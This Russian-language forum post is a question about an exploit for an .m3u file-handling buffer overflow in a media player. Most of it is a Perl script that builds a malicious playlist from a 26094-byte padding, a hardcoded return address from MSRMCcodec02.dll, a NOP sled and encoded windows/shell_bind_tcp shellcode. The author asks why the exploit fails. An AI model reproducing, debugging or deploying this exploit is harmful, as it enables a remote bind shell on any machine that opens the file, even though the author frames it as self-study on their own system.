уязвимость при обработке .m3u файлов. попробовал написать сплойт под этот продукт на свою систему (Win xp sp3 (Chip) x32).
получил смещение до EIP 26094, с помощью WinDBG получил адреса возврата с длл MSRMCcodec02.dll (01dbf23a;01df023f;01e0d3db;01e2b22a;01e2b72d;01e2cd89;01e35c9e;01e403d9;01e41400;01e4736d;01e4ce34;01e50159;01e52ec0;023b135b;0270ce2f;0270ea53), приатачил шелл windows/shell_bind_tcp и получил вот такой сплойт
и в итоге он не хочет работать! что еще можно сделать да бы сделать сплойт рабочим?
получил смещение до EIP 26094, с помощью WinDBG получил адреса возврата с длл MSRMCcodec02.dll (01dbf23a;01df023f;01e0d3db;01e2b22a;01e2b72d;01e2cd89;01e35c9e;01e403d9;01e41400;01e4736d;01e4ce34;01e50159;01e52ec0;023b135b;0270ce2f;0270ea53), приатачил шелл windows/shell_bind_tcp и получил вот такой сплойт
| Код |
|---|
my $file= "crash1.m3u";
my $junk= "A" x 26094;
my $eip = pack('V',0x01dbf23a,);
my $nop="\x90" x 30;
my $shellcode= "\xb8\x65\x7c\x17\x7e\xd9\xc5\xd9\x74\x24\xf4\x5b\x33\xc9" .
"\xb1\x56\x31\x43\x13\x03\x43\x13\x83\xeb\x99\x9e\xe2\x82" .
"\x89\xd6\x0d\x7b\x49\x89\x84\x9e\x78\x9b\xf3\xeb\x28\x2b" .
"\x77\xb9\xc0\xc0\xd5\x2a\x53\xa4\xf1\x5d\xd4\x03\x24\x53" .
"\xe5\xa5\xe8\x3f\x25\xa7\x94\x3d\x79\x07\xa4\x8d\x8c\x46" .
"\xe1\xf0\x7e\x1a\xba\x7f\x2c\x8b\xcf\xc2\xec\xaa\x1f\x49" .
"\x4c\xd5\x1a\x8e\x38\x6f\x24\xdf\x90\xe4\x6e\xc7\x9b\xa3" .
"\x4e\xf6\x48\xb0\xb3\xb1\xe5\x03\x47\x40\x2f\x5a\xa8\x72" .
"\x0f\x31\x97\xba\x82\x4b\xdf\x7d\x7c\x3e\x2b\x7e\x01\x39" .
"\xe8\xfc\xdd\xcc\xed\xa7\x96\x77\xd6\x56\x7b\xe1\x9d\x55" .
"\x30\x65\xf9\x79\xc7\xaa\x71\x85\x4c\x4d\x56\x0f\x16\x6a" .
"\x72\x4b\xcd\x13\x23\x31\xa0\x2c\x33\x9d\x1d\x89\x3f\x0c" .
"\x4a\xab\x1d\x59\xbf\x86\x9d\x99\xd7\x91\xee\xab\x78\x0a" .
"\x79\x80\xf1\x94\x7e\xe7\x28\x60\x10\x16\xd2\x91\x38\xdd" .
"\x86\xc1\x52\xf4\xa6\x89\xa2\xf9\x73\x1d\xf3\x55\x2b\xde" .
"\xa3\x15\x9b\xb6\xa9\x99\xc4\xa7\xd1\x73\x73\xe0\x1f\xa7" .
"\xd0\x87\x5d\x57\xde\xf9\xeb\xb1\xb4\x15\xba\x6a\x20\xd4" .
"\x99\xa2\xd7\x27\xc8\x9e\x40\xb0\x44\xc9\x56\xbf\x54\xdf" .
"\xf5\x6c\xfc\x88\x8d\x7e\x39\xa8\x92\xaa\x69\xa3\xab\x3d" .
"\xe3\xdd\x7e\xdf\xf4\xf7\xe8\x7c\x66\x9c\xe8\x0b\x9b\x0b" .
"\xbf\x5c\x6d\x42\x55\x71\xd4\xfc\x4b\x88\x80\xc7\xcf\x57" .
"\x71\xc9\xce\x1a\xcd\xed\xc0\xe2\xce\xa9\xb4\xba\x98\x67" .
"\x62\x7d\x73\xc6\xdc\xd7\x28\x80\x88\xae\x02\x13\xce\xae" .
"\x4e\xe5\x2e\x1e\x27\xb0\x51\xaf\xaf\x34\x2a\xcd\x4f\xba" .
"\xe1\x55\x7f\xf1\xab\xfc\xe8\x5c\x3e\xbd\x74\x5f\x95\x82" .
"\x80\xdc\x1f\x7b\x77\xfc\x6a\x7e\x33\xba\x87\xf2\x2c\x2f" .
"\xa7\xa1\x4d\x7a";
open($FILE,">$file");
print $FILE $junk.$eip.$nop.$shellcode;
close($FILE);
print "m3u File Created successfully\n"; |
и в итоге он не хочет работать! что еще можно сделать да бы сделать сплойт рабочим?